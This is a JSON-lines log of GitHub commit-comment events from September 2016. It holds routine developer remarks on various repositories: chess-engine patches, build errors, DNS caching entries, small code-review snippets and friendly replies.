{"id":"4512261305","type":"CommitCommentEvent","actor":{"login":"DudePascalou"},"repo":{"name":"DudePascalou/OwinFormsAuthenticationTutorial"},"payload":{"comment":{"id":18890269,"position":null,"line":null,"path":null,"commit_id":"611ded823f2cf5e4b4028ab1fd9de6cb9efc6b8a","created_at":"2016-09-03T14:45:15Z","updated_at":"2016-09-03T14:45:15Z","body":"Bonjour, désolé pour la réponse tardive, je n'avais pas vu ce commentaire !\r\nSi je comprends, bien, tu souhaites pouvoir proposer une base de données d'utilisateurs ?\r\nLe tutoriel ne traite pas de ce sujet, il y a déjà beaucoup de ressources qui le font très bien.\r\nCe que je peux te dire tout de suite, c'est que tu pourras placer ton code dans la méthode ValidateUser de la classe AuthenticationController ."}},"created_at":"2016-09-03T14:45:15Z"}
{"id":"4512262006","type":"CommitCommentEvent","actor":{"login":"nzjrs"},"repo":{"name":"dddomodossola/remi"},"payload":{"comment":{"id":18890271,"position":null,"line":null,"path":null,"commit_id":"1eeb7c2fc5f587177358ddac29f772b5ea2fe82b","created_at":"2016-09-03T14:45:46Z","updated_at":"2016-09-03T14:45:46Z","body":"What is the symptom for the first bug? I am surprised I have never seen it. How do you reproduce it?"}},"created_at":"2016-09-03T14:45:46Z"}
{"id":"4512262752","type":"CommitCommentEvent","actor":{"login":"didier2020"},"repo":{"name":"frodrigo/osmose-backend"},"payload":{"comment":{"id":18890275,"position":null,"line":null,"path":null,"commit_id":"a15518ac4e9b42b01167c0965813ed545cc70b2f","created_at":"2016-09-03T14:46:17Z","updated_at":"2016-09-03T14:46:17Z","body":"in where there is \r\n((b1.tags @> b2.tags) OR (b2.tags @> b1.tags))\r\nin select there is\r\nb1.tags = b2.tags\r\nso you can do like the ways\r\nself.callback30 = lambda res: {\"class\":1 if res[3] else 2, \"data\":[self.node_full, self.node_full, self.positionAsText]}"}},"created_at":"2016-09-03T14:46:17Z"}
{"id":"4512262962","type":"CommitCommentEvent","actor":{"login":"mapx-"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":18890276,"position":null,"line":null,"path":null,"commit_id":"f6cdb14d2fcf0296851f654733b8b672c5db8973","created_at":"2016-09-03T14:46:26Z","updated_at":"2016-09-03T14:46:26Z","body":"anyway, ubo can take care of the popunder the user complained about. ABP needs such specialized filters."}},"created_at":"2016-09-03T14:46:26Z"}
{"id":"4512265995","type":"CommitCommentEvent","actor":{"login":"ganthore"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":18890278,"position":null,"line":null,"path":null,"commit_id":"7e18cbcde5883a589de28e3dbdc3a6528261725b","created_at":"2016-09-03T14:48:54Z","updated_at":"2016-09-03T14:48:54Z","body":"Confirmed that the build error is being caused by the notmuch use flag."}},"created_at":"2016-09-03T14:48:54Z"}
{"id":"4512266086","type":"CommitCommentEvent","actor":{"login":"JarnoVgr"},"repo":{"name":"JarnoVgr/Mr.Green-MTA-Resources"},"payload":{"comment":{"id":18890279,"position":null,"line":null,"path":null,"commit_id":"488be3dd22db14de273d0c374bd4accaac38b311","created_at":"2016-09-03T14:48:59Z","updated_at":"2016-09-03T14:48:59Z","body":"Git is confusing sometimes. Maybe you should look into making pull requests instead of doing direct pushes. That might fix the issue."}},"created_at":"2016-09-03T14:48:59Z"}
{"id":"4512266374","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":18890280,"position":null,"line":null,"path":null,"commit_id":"1bd270ddd7547b91b763600cae0e10afbdcb61d0","created_at":"2016-09-03T14:49:11Z","updated_at":"2016-09-03T14:49:11Z","body":"I don't see what is wrong.\r\nTest was stoped automatically (see in http://tests.stockfishchess.org/actions)\r\nbecause of one worker reporting \"Wrong bench in base Expected: 7735376 Got: 8032058\"\r\n\r\nBut 6 other workers did not had that problem ! And my Windows 7 also reports 7735376.\r\n\r\nMaybe this was just an isolated problem on that worker\r\n\r\nI suggest to go in http://tests.stockfishchess.org/tests/view/57cabfd20ebc59030fbe4dd8 \r\nand try the button Reschedule.  Let's see how it goes.\r\n\r\nIf problem persist, we will ask help on the forum. Something was possibly not initialized correctly, and Linux systems are possibly not behaving the same.\r\n\r\n"}},"created_at":"2016-09-03T14:49:11Z"}
{"id":"4512267083","type":"CommitCommentEvent","actor":{"login":"flo"},"repo":{"name":"Terasology/StructureTemplates"},"payload":{"comment":{"id":18890281,"position":null,"line":null,"path":null,"commit_id":"2164934d188895d4607bd6c8f35451015a3a268d","created_at":"2016-09-03T14:49:43Z","updated_at":"2016-09-03T14:49:43Z","body":"thanks for the pull request"}},"created_at":"2016-09-03T14:49:43Z"}
{"id":"4512267788","type":"CommitCommentEvent","actor":{"login":"didier2020"},"repo":{"name":"frodrigo/osmose-backend"},"payload":{"comment":{"id":18890282,"position":null,"line":null,"path":null,"commit_id":"a15518ac4e9b42b01167c0965813ed545cc70b2f","created_at":"2016-09-03T14:50:17Z","updated_at":"2016-09-03T14:50:17Z","body":"to separate ways and nodes , keep class 3 and add 4  ?"}},"created_at":"2016-09-03T14:50:17Z"}
{"id":"4512268522","type":"CommitCommentEvent","actor":{"login":"jamison904"},"repo":{"name":"Jovy23/N930TUVU1APGC_Kernel"},"payload":{"comment":{"id":18890283,"position":null,"line":null,"path":null,"commit_id":"19d69705f33b7b85e532895d4da6f1285ae06d27","created_at":"2016-09-03T14:50:50Z","updated_at":"2016-09-03T14:50:50Z","body":"Is it booting?"}},"created_at":"2016-09-03T14:50:50Z"}
{"id":"4512270455","type":"CommitCommentEvent","actor":{"login":"AleksCore"},"repo":{"name":"JarnoVgr/Mr.Green-MTA-Resources"},"payload":{"comment":{"id":18890284,"position":null,"line":null,"path":null,"commit_id":"488be3dd22db14de273d0c374bd4accaac38b311","created_at":"2016-09-03T14:52:18Z","updated_at":"2016-09-03T14:52:18Z","body":"Alright I'll look into this deeper!"}},"created_at":"2016-09-03T14:52:18Z"}
{"id":"4512271477","type":"CommitCommentEvent","actor":{"login":"FGDATA"},"repo":{"name":"IAHM-COL/KingAir-350"},"payload":{"comment":{"id":18890285,"position":null,"line":null,"path":null,"commit_id":"d13e6ddeed75a28c00128d1782106672dd530870","created_at":"2016-09-03T14:53:04Z","updated_at":"2016-09-03T14:53:04Z","body":"Hi @D-ECHO \r\n\r\nI just imported and pushed the blender file into the sources folder\r\n\r\nhttps://github.com/IAHM-COL/KingAir-350/blob/Flightdeck-development/Sources/Models/flightdeck.blend\r\n\r\nJust pull, and you get it :dart: \r\n\r\n@IAHM-COL "}},"created_at":"2016-09-03T14:53:04Z"}
{"id":"4512272233","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18890286,"position":null,"line":null,"path":null,"commit_id":"03a30bee07ecd2c16536533cb59707eefbbfc64f","created_at":"2016-09-03T14:53:38Z","updated_at":"2016-09-03T14:53:38Z","body":"Might not be as \"accurate\", but this will save many loops.\r\nVery curious about the result. Good try !"}},"created_at":"2016-09-03T14:53:38Z"}
{"id":"4512273250","type":"CommitCommentEvent","actor":{"login":"adizero"},"repo":{"name":"rhysd/vim-clang-format"},"payload":{"comment":{"id":18890287,"position":null,"line":null,"path":null,"commit_id":"416ff2b4fa19b839d6fef54d6fa43344dd1e0f1b","created_at":"2016-09-03T14:54:21Z","updated_at":"2016-09-03T14:54:21Z","body":"This should fix the problem with cursor position not maintained after doing undo. I am using it for quite a while (more than a year) and did not observe any other problems."}},"created_at":"2016-09-03T14:54:21Z"}
{"id":"4512278399","type":"CommitCommentEvent","actor":{"login":"karthick111"},"repo":{"name":"yu-aosp-n/device_cyanogen_msm8916-common"},"payload":{"comment":{"id":18890293,"position":null,"line":null,"path":null,"commit_id":"c58a11e0027a6ca9377fffdc27a5aea14bd565f2","created_at":"2016-09-03T14:58:14Z","updated_at":"2016-09-03T14:58:14Z","body":"why did you disable releasetools ?"}},"created_at":"2016-09-03T14:58:14Z"}
{"id":"4512281294","type":"CommitCommentEvent","actor":{"login":"gokceneraslan"},"repo":{"name":"gokceneraslan/weberror"},"payload":{"comment":{"id":18890295,"position":null,"line":null,"path":null,"commit_id":"2ccb38c149026593a34e661c7f38216851536538","created_at":"2016-09-03T15:00:19Z","updated_at":"2016-09-03T15:00:19Z","body":"`content` [here](https://github.com/gjhiggins/tempita/blob/master/tempita/__init__.py#L149) should be a string, not byte. Otherwise we get an exception [here](https://github.com/gjhiggins/tempita/blob/master/tempita/__init__.py#L647)"}},"created_at":"2016-09-03T15:00:19Z"}
{"id":"4512286601","type":"CommitCommentEvent","actor":{"login":"jasdeepkhalsa"},"repo":{"name":"sikher/sikher"},"payload":{"comment":{"id":18890298,"position":24,"line":101,"path":"www/js/app.js","commit_id":"024d8dee76efbbfd71030c1f498ac12faea0a2ae","created_at":"2016-09-03T15:04:17Z","updated_at":"2016-09-03T15:04:17Z","body":"This has the effect of the search not updating, so maybe we will have to separate out the search results screen from the initial search page, and cache the search results but not the search page"}},"created_at":"2016-09-03T15:04:17Z"}
{"id":"4512286758","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18890299,"position":null,"line":null,"path":null,"commit_id":"03a30bee07ecd2c16536533cb59707eefbbfc64f","created_at":"2016-09-03T15:04:25Z","updated_at":"2016-09-03T15:04:25Z","body":"True. The way I see it, too, is that it will give less bonuses than the current master for threats that are only exchanges (because the target is doubly protected) or are even non-existent (like most threats by king in endgame on pawns which are doubly protected) "}},"created_at":"2016-09-03T15:04:25Z"}
{"id":"4512288763","type":"CommitCommentEvent","actor":{"login":"Jswoon"},"repo":{"name":"wirelessopensource/lora_shield_arduino"},"payload":{"comment":{"id":18890301,"position":null,"line":null,"path":null,"commit_id":"fc4892b973913a326c5c68cfbc18c407c0c7d352","created_at":"2016-09-03T15:06:00Z","updated_at":"2016-09-03T15:06:00Z","body":"![image](https://cloud.githubusercontent.com/assets/18732266/18225678/bbb4c72a-722a-11e6-8418-8d7b82fc7ada.png)\r\nI followed the code but I fail to receive any messages sent although the configuration is correct. Is there any things that I need to take note of? \r\n\r\nHope to hear from you.\r\n\r\nRegards,\r\nShen"}},"created_at":"2016-09-03T15:06:00Z"}
{"id":"4512291355","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/pamac"},"payload":{"comment":{"id":18890309,"position":null,"line":null,"path":null,"commit_id":"f30932ce8b1bd579c8a845aa653ddce8915a10e6","created_at":"2016-09-03T15:07:59Z","updated_at":"2016-09-03T15:07:59Z","body":"Hi @guinux, when ever you think it is ready to release **v4.1.5**, do so. You may also adjust the **PKGBUILD** if needed, Don't forget to bump the version :smile: "}},"created_at":"2016-09-03T15:07:59Z"}
{"id":"4512291786","type":"CommitCommentEvent","actor":{"login":"zas"},"repo":{"name":"metabrainz/picard"},"payload":{"comment":{"id":18890314,"position":5,"line":117,"path":"picard/ui/searchdialog.py","commit_id":"022f7fedaab82a0e34a213f7b26f7e2f74864d65","created_at":"2016-09-03T15:08:18Z","updated_at":"2016-09-03T15:08:18Z","body":"You should set a shortcut : `QtGui.QPushButton(_(\"&Load into Picard\"))` (L as accelerator)"}},"created_at":"2016-09-03T15:08:18Z"}
{"id":"4512296906","type":"CommitCommentEvent","actor":{"login":"kmtsullivan"},"repo":{"name":"kmtsullivan/hello-world"},"payload":{"comment":{"id":18890317,"position":4,"line":4,"path":"README.md","commit_id":"86eaba48eeea23c774c77affb9010038c6bff223","created_at":"2016-09-03T15:12:30Z","updated_at":"2016-09-03T15:12:30Z","body":"I have learned Java over the last year.  I am currently refreshing my knowledge of C and C++, and learning C#."}},"created_at":"2016-09-03T15:12:30Z"}
{"id":"4512298162","type":"CommitCommentEvent","actor":{"login":"Rajimakond"},"repo":{"name":"Rajimakond/Ansible_Wordpress"},"payload":{"comment":{"id":18890318,"position":null,"line":null,"path":null,"commit_id":"53b97185149da39b4622cf851a0d994efd7cdc7c","created_at":"2016-09-03T15:13:32Z","updated_at":"2016-09-03T15:13:32Z","body":"good"}},"created_at":"2016-09-03T15:13:32Z"}
{"id":"4512299086","type":"CommitCommentEvent","actor":{"login":"grobian"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":18890319,"position":null,"line":null,"path":null,"commit_id":"7e18cbcde5883a589de28e3dbdc3a6528261725b","created_at":"2016-09-03T15:14:18Z","updated_at":"2016-09-03T15:14:18Z","body":"This is https://bugs.gentoo.org/show_bug.cgi?id=592680, thanks"}},"created_at":"2016-09-03T15:14:18Z"}
{"id":"4512299883","type":"CommitCommentEvent","actor":{"login":"nmegill"},"repo":{"name":"metamath/set.mm"},"payload":{"comment":{"id":18890321,"position":null,"line":null,"path":null,"commit_id":"e06049900d795f8b5a0dad481345b6f4d523c0f2","created_at":"2016-09-03T15:14:54Z","updated_at":"2016-09-03T15:14:54Z","body":"I can't reproduce this with 'write source set.mm/rewrap'.  If I change \n\"David A. Wheeler\" to \"David A.  Wheeler\", /rewrap correctly takes out \nthe extra space.  If you can reproduce this let me know.\n\nBTW a description under a section title is not currently rewrapped.  I \nplan to fix this someday, but for now any formatting desired there must \nbe done by hand.\n\nNorm\n\nOn 9/3/16 9:18 AM, Norman Megill wrote:\n> On 9/2/16 11:15 PM, Mario Carneiro wrote:\n>> This is a shortcoming of |metamath.exe|'s rewrap command, I'm sure\n>> (which prefers to double-space between sentences). Chances are these\n>> will be reverted in the next official release.\n>\n> The algorithm should not put a double space after an initial, and this\n> is a bug I'll take care of.  So if it happens again in the short term,\n> don't bother to fix it because it will be fixed eventually.  Of course\n> it doesn't affect the web page appearance.\n>\n> The double space between sentences is (was) in many style guides for\n> monospaced text (i.e. most typewriters), and it is also the default\n> wrapping behavior I've seen in several text editors.  Even vi does it\n> with the \"gq}\" command, correctly recognizing special cases such as\n> \"Mr.\" and \"i.e.\" and \"A.\" that should not have double space.\n>\n> Norm\n\n"}},"created_at":"2016-09-03T15:14:54Z"}
{"id":"4512303751","type":"CommitCommentEvent","actor":{"login":"JustinChangTW"},"repo":{"name":"JustinChangTW/ASPMVC5HomeWork"},"payload":{"comment":{"id":18890324,"position":9,"line":24,"path":"Session1/Session1/Models/ViewModel/AccountBookViewModel.cs","commit_id":"74c5ae27a6f649a939bba68635141c18f2f29493","created_at":"2016-09-03T15:17:59Z","updated_at":"2016-09-03T15:17:59Z","body":"在不加double時會出錯。"}},"created_at":"2016-09-03T15:17:59Z"}
{"id":"4512303959","type":"CommitCommentEvent","actor":{"login":"shroomdog27"},"repo":{"name":"PonyvilleSquare/ServerBridge"},"payload":{"comment":{"id":18890325,"position":27,"line":27,"path":"src/com/pvs/serverbridge/ServerBridgePlugin.java","commit_id":"9111d03b0dff805f19a0ec36c064b5b1d199cb16","created_at":"2016-09-03T15:18:08Z","updated_at":"2016-09-03T15:18:08Z","body":"Nothing, I just gave Hepolite the full class name and I guess he just copy/pasted that instead of importing it."}},"created_at":"2016-09-03T15:18:08Z"}
{"id":"4512305147","type":"CommitCommentEvent","actor":{"login":"vivin"},"repo":{"name":"vivin/gradle-semantic-build-versioning"},"payload":{"comment":{"id":18890328,"position":null,"line":null,"path":null,"commit_id":"0dc0e185937c10680199fee0bfe9ca8da36d12f3","created_at":"2016-09-03T15:19:06Z","updated_at":"2016-09-03T15:19:06Z","body":"Makes sense. I will update the documentation. Most plugins seem to be pretty well-behaved in this regard. I used the publishing plugin and it resolved the version fine even though it was configured regularly. Using properties seems to be another option."}},"created_at":"2016-09-03T15:19:06Z"}
{"id":"4512305890","type":"CommitCommentEvent","actor":{"login":"dounine"},"repo":{"name":"dounine/feedback"},"payload":{"comment":{"id":18890329,"position":null,"line":null,"path":null,"commit_id":"482f5e3611180b82e6ba869bc582062a3e5f73b7","created_at":"2016-09-03T15:19:42Z","updated_at":"2016-09-03T15:19:42Z","body":"可以，没什么问题"}},"created_at":"2016-09-03T15:19:42Z"}
{"id":"4512311183","type":"CommitCommentEvent","actor":{"login":"mhsjlw"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":18890333,"position":null,"line":null,"path":null,"commit_id":"b97f4c3133d4df4a78e276d2ca3fcddc808de260","created_at":"2016-09-03T15:23:54Z","updated_at":"2016-09-03T15:23:54Z","body":"No, signed makes sense. Some chunk's coordinates can be negatives."}},"created_at":"2016-09-03T15:23:54Z"}
{"id":"4512311255","type":"CommitCommentEvent","actor":{"login":"nexusofdoom"},"repo":{"name":"bntjah/lancache"},"payload":{"comment":{"id":18890334,"position":null,"line":null,"path":null,"commit_id":"7e93e1b4a76fbfc79fe5e51c76a3b6b2a0fe0fae","created_at":"2016-09-03T15:23:58Z","updated_at":"2016-09-03T15:23:58Z","body":"tested again today it downloaded to 63% it looks like since its still beta\nthere is new files.. so clearing the ea folder cache and retesting.\nadded this url also to the dns on my side for testing ..\n\naddress=/.origin-a.akamaihd.net/10.\naddress=/.origin-b.akamaihd.net/10.\naddress=/.river.data.ea.com/10.\naddress=/.lvlt.cdn.ea.com/10.\naddress=/secure.download.dm.origin.com/10\naddress=/heartbeat.dm.origin.com/10.\n\n\n<http://www.discoverpc.net>\nTravus Elm - Support Specialist\ntravus@discoverpc.net discoverpc.NET <http://discoverpc.net/>, 1402 Tower\nAve., Superior, WI 54880\nLocal: (715) 398-6767 ::: Toll-free: (800) 721-1350\nMobile: (218) 260-1940 ::: Fax: (866) 704-3660\n*Follow or like us on **Google+*\n<https://plus.google.com/111445774308955992766/about?gl=us&hl=en>*, **Facebook\n<http://www.facebook.com/pages/discoverpcNET-Computer-Solutions-Center/35471145348>,\n**LinkedIn\n<https://www.linkedin.com/in/travus-elm-73842268?trk=nav_responsive_tab_profile>*\n\nPRIVILEGED AND CONFIDENTIAL COMMUNICATION This e-mail transmission, and any\ndocuments, files or previous e-mail messages attached to it, may contain\nconfidential information that is legally privileged. If you are not the\nintended recipient or a person responsible for delivering it to the\nintended recipient, you are hereby notified that any disclosure, copying,\ndistribution or use of any of the information contained in or attached to\nthis transmission is STRICTLY PROHIBITED. If you have received this\ntransmission in error, please: (1) immediately notify me by reply e-mail,\nor by collect telephone call; and (2) destroy the original transmission and\nits attachments without reading or saving in any manner\n.\n\nOn Fri, Sep 2, 2016 at 6:43 AM, bntjah <notifications@github.com> wrote:\n\n> Interesting; I thought I had every thing before but didn't know that EA\n> had a new url.\n> If you add this does it actually cache and next time you download doesn't\n> download directly from internet?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/bntjah/lancache/commit/7e93e1b4a76fbfc79fe5e51c76a3b6b2a0fe0fae#commitcomment-18878929>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/APwRgYE54IDWXoP76iSWQvvjFG5x4Zqyks5qmAvWgaJpZM4JzoEE>\n> .\n>\n"}},"created_at":"2016-09-03T15:23:58Z"}
{"id":"4512312638","type":"CommitCommentEvent","actor":{"login":"teresathen"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18890335,"position":null,"line":null,"path":null,"commit_id":"f51bd71936184668e14ad33ddaa9715d2e6c0807","created_at":"2016-09-03T15:25:06Z","updated_at":"2016-09-03T15:25:06Z","body":"nein, wenn ich auf I DONT WANT TO PARTICIPATE KLICKE, erscheint ein Toast mit \"Event deleted\" und wieder die Activity mit allen meinen Events, das Event steht aber nach wie vor da.."}},"created_at":"2016-09-03T15:25:06Z"}
{"id":"4512314615","type":"CommitCommentEvent","actor":{"login":"willedwards"},"repo":{"name":"willedwards/cloud-pubsub-samples-java"},"payload":{"comment":{"id":18890337,"position":null,"line":null,"path":null,"commit_id":"647f498810d1256e4198a972f880b4db44a86cbd","created_at":"2016-09-03T15:26:36Z","updated_at":"2016-09-03T15:26:36Z","body":"If I read the code correctly in this project, there is a continual loop in the javascript code, which calls the fetchMessagesServlet on the back end. If this is true, then what we have is polling, as opposed to a callback like good old JMS\r\n\r\n```public void onMessage(...)```\r\n\r\nIs it not possible to have the gcloud sub expose a similar interface for callback ? Or have I missed something?"}},"created_at":"2016-09-03T15:26:36Z"}
{"id":"4512315647","type":"CommitCommentEvent","actor":{"login":"jaylach"},"repo":{"name":"pnb3431/bloc-jams"},"payload":{"comment":{"id":18890338,"position":20,"line":192,"path":"scripts/album.js","commit_id":"e14cf1bc073a51d57368067d06f25f2173f99fc8","created_at":"2016-09-03T15:27:23Z","updated_at":"2016-09-03T15:27:23Z","body":"```\r\nvar currentlyPlayingCell = $('.song-item-number[data-song-number=\"' + currentlyPlayingSongNumber + '\"]');\r\ncurrentlyPlayingCell.html(pauseButtonTemplate);\r\n$('.main-controls .play-pause').html(playerBarPauseButton);```\r\n\r\nThis stuff doesn't need to be within the if...else, as it's the same for both conditions :)"}},"created_at":"2016-09-03T15:27:23Z"}
{"id":"4512317785","type":"CommitCommentEvent","actor":{"login":"freeformz"},"repo":{"name":"lib/pq"},"payload":{"comment":{"id":18890341,"position":17,"line":751,"path":"conn.go","commit_id":"57837c73d5c04cf0ebbfbd855251dc692559ce59","created_at":"2016-09-03T15:29:09Z","updated_at":"2016-09-03T15:29:09Z","body":"FWIW: I was running my tests with -race and it didn't trigger it.  I think all of this code is synchronous. The reason why the race detector went off in the first place is that COPY ends up creating another go routine that modifies a buffer. That's not the case here AFAICT."}},"created_at":"2016-09-03T15:29:09Z"}
{"id":"4512317947","type":"CommitCommentEvent","actor":{"login":"glenndev"},"repo":{"name":"rspivak/lsbaws"},"payload":{"comment":{"id":18890343,"position":null,"line":null,"path":null,"commit_id":"d482f01f59fc682685d76044f46bd54f8def3f50","created_at":"2016-09-03T15:29:15Z","updated_at":"2016-09-03T15:29:15Z","body":"I searched the python docs online. It seemed to require parens after the print commend.\r\n\r\nSo I replaced the line with `print (request)` and at least that line worked better.\r\n\r\n"}},"created_at":"2016-09-03T15:29:15Z"}
{"id":"4512319040","type":"CommitCommentEvent","actor":{"login":"david-a-wheeler"},"repo":{"name":"metamath/set.mm"},"payload":{"comment":{"id":18890344,"position":null,"line":null,"path":null,"commit_id":"e06049900d795f8b5a0dad481345b6f4d523c0f2","created_at":"2016-09-03T15:30:06Z","updated_at":"2016-09-03T15:30:06Z","body":"I also prefer two spaces after a sentence. But I don't think my middle initial counts as the end of a sentence :-).\n--- David A.Wheeler"}},"created_at":"2016-09-03T15:30:06Z"}
{"id":"4512319837","type":"CommitCommentEvent","actor":{"login":"ganthore"},"repo":{"name":"gentoo/gentoo"},"payload":{"comment":{"id":18890345,"position":null,"line":null,"path":null,"commit_id":"7e18cbcde5883a589de28e3dbdc3a6528261725b","created_at":"2016-09-03T15:30:33Z","updated_at":"2016-09-03T15:30:33Z","body":"Thx for the bug link."}},"created_at":"2016-09-03T15:30:33Z"}
{"id":"4512320803","type":"CommitCommentEvent","actor":{"login":"auto-mate"},"repo":{"name":"auto-mate/vlookupEx"},"payload":{"comment":{"id":18890346,"position":2,"line":2,"path":"function.bat","commit_id":"4e5d5fc4a055eabbab1db12c4cefebc05427f9ed","created_at":"2016-09-03T15:31:10Z","updated_at":"2016-09-03T15:31:10Z","body":"'reinstate"}},"created_at":"2016-09-03T15:31:10Z"}
{"id":"4512324067","type":"CommitCommentEvent","actor":{"login":"olivermichel"},"repo":{"name":"olivermichel/pdns-dnsupdate"},"payload":{"comment":{"id":18890348,"position":null,"line":null,"path":null,"commit_id":"542ab6963d554b00e56aab5edb93d819d6f5f8c8","created_at":"2016-09-03T15:33:31Z","updated_at":"2016-09-03T15:33:31Z","body":"Oh nice, thanks for the advice. Yeah the version number is the reason why I didn't use the packaged file. But for some reason I also can't find the respective schema files listed for the package in the filesystem. Any idea what's going on there?\r\n\r\n```\r\n[root@43dddaadd3b9 /]# rpm -ql pens-backend-sqlite\r\n/usr/lib64/pdns/libgsqlite3backend.so\r\n/usr/share/doc/pdns-backend-sqlite-4.0.1\r\n/usr/share/doc/pdns-backend-sqlite-4.0.1/dnssec-3.x_to_3.4.0_schema.sqlite3.sql\r\n/usr/share/doc/pdns-backend-sqlite-4.0.1/nodnssec-3.x_to_3.4.0_schema.sqlite3.sql\r\n/usr/share/doc/pdns-backend-sqlite-4.0.1/schema.sqlite3.sql\r\n```"}},"created_at":"2016-09-03T15:33:31Z"}
{"id":"4512324138","type":"CommitCommentEvent","actor":{"login":"pflugs30"},"repo":{"name":"nunit/nunit"},"payload":{"comment":{"id":18890349,"position":null,"line":null,"path":null,"commit_id":"e1cc0441ca3bb48fd7a3e35d0660057fd139f2a9","created_at":"2016-09-03T15:33:34Z","updated_at":"2016-09-03T15:33:34Z","body":"Looks good to me. Reviewed on phone and not compiled locally, but assuming that's already been done. Thanks!"}},"created_at":"2016-09-03T15:33:34Z"}
{"id":"4512325196","type":"CommitCommentEvent","actor":{"login":"irfanG"},"repo":{"name":"merimad/Zadace"},"payload":{"comment":{"id":18890350,"position":null,"line":null,"path":null,"commit_id":"dd83f5a202be553c794f56195084a32121fb8330","created_at":"2016-09-03T15:34:20Z","updated_at":"2016-09-03T15:34:20Z","body":"hm, ali u ovom i dalje nema dijelova koji se ticu zadace od prosle sedmice: a to je UITableViewController i UINavigationController? \r\n\r\nusput: u ovom kodu sto imas fali ti: \r\n- odobravanje permisije za pristup slikama: \r\n`static func checkPhotoLibraryPermission() {\r\n        let status = PHPhotoLibrary.authorizationStatus()\r\n        switch status {\r\n        case .Authorized:\r\n            //handle authorized status\r\n        case .Denied, .Restricted :\r\n            //handle denied status\r\n        case .NotDetermined:\r\n            // ask for permissions\r\n            PHPhotoLibrary.requestAuthorization() { (status) -> Void in\r\n                switch status {\r\n                case .Authorized:\r\n                    // as above\r\n                case .Denied, .Restricted:\r\n                    // as above\r\n                case .NotDetermined:\r\n                    // won't happen but still\r\n                }\r\n            }\r\n        }\r\n    }\r\n"}},"created_at":"2016-09-03T15:34:20Z"}
{"id":"4512325446","type":"CommitCommentEvent","actor":{"login":"Workshop2"},"repo":{"name":"TotalJobsGroup/Syringe"},"payload":{"comment":{"id":18890351,"position":11,"line":10,"path":"src/Syringe.Service/Controllers/Hubs/CompletedTaskInfo.cs","commit_id":"9366409436412d44973d7b2906f37eecd843af4d","created_at":"2016-09-03T15:34:33Z","updated_at":"2016-09-03T15:34:33Z","body":"I think this is used in JS to do the redirect...?"}},"created_at":"2016-09-03T15:34:33Z"}
{"id":"4512325545","type":"CommitCommentEvent","actor":{"login":"McPhelpsius"},"repo":{"name":"fabean/100-days-of-code"},"payload":{"comment":{"id":18890352,"position":null,"line":null,"path":null,"commit_id":"66040b7bc0f56e87d05d172f086cdb92221f04b8","created_at":"2016-09-03T15:34:37Z","updated_at":"2016-09-03T15:34:37Z","body":"Sweet. Glob star?\r\n"}},"created_at":"2016-09-03T15:34:37Z"}
{"id":"4512327513","type":"CommitCommentEvent","actor":{"login":"Jovy23"},"repo":{"name":"Jovy23/N930TUVU1APGC_Kernel"},"payload":{"comment":{"id":18890356,"position":null,"line":null,"path":null,"commit_id":"19d69705f33b7b85e532895d4da6f1285ae06d27","created_at":"2016-09-03T15:36:11Z","updated_at":"2016-09-03T15:36:11Z","body":"Sup Jamison! The thing is all i get is compile warnings when trying to compiling the kernel. Something that has to do about file or directory missing or doesn't exist with #include \"<slpi_motor.h\" in drivers/adsp_factory/k6ds3_accel.c. Once i change it to #include \"../adsp_factory/slpi_motor.h\" it passes, but then i would get the same compile warning message with #include \"include/sec_charging_common.h\" in drivers/battery_v2/include/fuelgauge/max77854_fuelgauge.h."}},"created_at":"2016-09-03T15:36:11Z"}
{"id":"4512327889","type":"CommitCommentEvent","actor":{"login":"dacresni"},"repo":{"name":"larsks/ansible"},"payload":{"comment":{"id":18890357,"position":null,"line":null,"path":null,"commit_id":"e8aeb3170fbed717ded64316d6c6c26ce8f4c01e","created_at":"2016-09-03T15:36:27Z","updated_at":"2016-09-03T15:36:27Z","body":"are you going to rebase this like they ask? "}},"created_at":"2016-09-03T15:36:27Z"}
{"id":"4512329304","type":"CommitCommentEvent","actor":{"login":"Workshop2"},"repo":{"name":"TotalJobsGroup/Syringe"},"payload":{"comment":{"id":18890360,"position":11,"line":10,"path":"src/Syringe.Service/Controllers/Hubs/CompletedTaskInfo.cs","commit_id":"9366409436412d44973d7b2906f37eecd843af4d","created_at":"2016-09-03T15:37:32Z","updated_at":"2016-09-03T15:37:32Z","body":"Wait, I was thinking of something else..."}},"created_at":"2016-09-03T15:37:32Z"}
{"id":"4512331050","type":"CommitCommentEvent","actor":{"login":"Marshall-T"},"repo":{"name":"Marshall-T/Chapter.2"},"payload":{"comment":{"id":18890361,"position":3,"line":2,"path":"README.md","commit_id":"1c736203d3711ebb5d14480b43444c50eef83dda","created_at":"2016-09-03T15:38:51Z","updated_at":"2016-09-03T15:38:51Z","body":" first try will do again"}},"created_at":"2016-09-03T15:38:51Z"}
{"id":"4512332062","type":"CommitCommentEvent","actor":{"login":"Seeebastian"},"repo":{"name":"189764/OneArmBandit"},"payload":{"comment":{"id":18890364,"position":null,"line":null,"path":null,"commit_id":"c0ed42f4e29bd6e9bfbff9fd7063635c6f96fa65","created_at":"2016-09-03T15:39:40Z","updated_at":"2016-09-03T15:39:40Z","body":"Did #8"}},"created_at":"2016-09-03T15:39:40Z"}
{"id":"4512332598","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":18890365,"position":null,"line":null,"path":null,"commit_id":"03a30bee07ecd2c16536533cb59707eefbbfc64f","created_at":"2016-09-03T15:40:04Z","updated_at":"2016-09-03T15:40:04Z","body":"Hmm, that said, the patch is now missing some attacks by minors on queens and rooks, if the queen or the rook are twice defended :-(  \r\n\r\nMay have to correct this..."}},"created_at":"2016-09-03T15:40:04Z"}
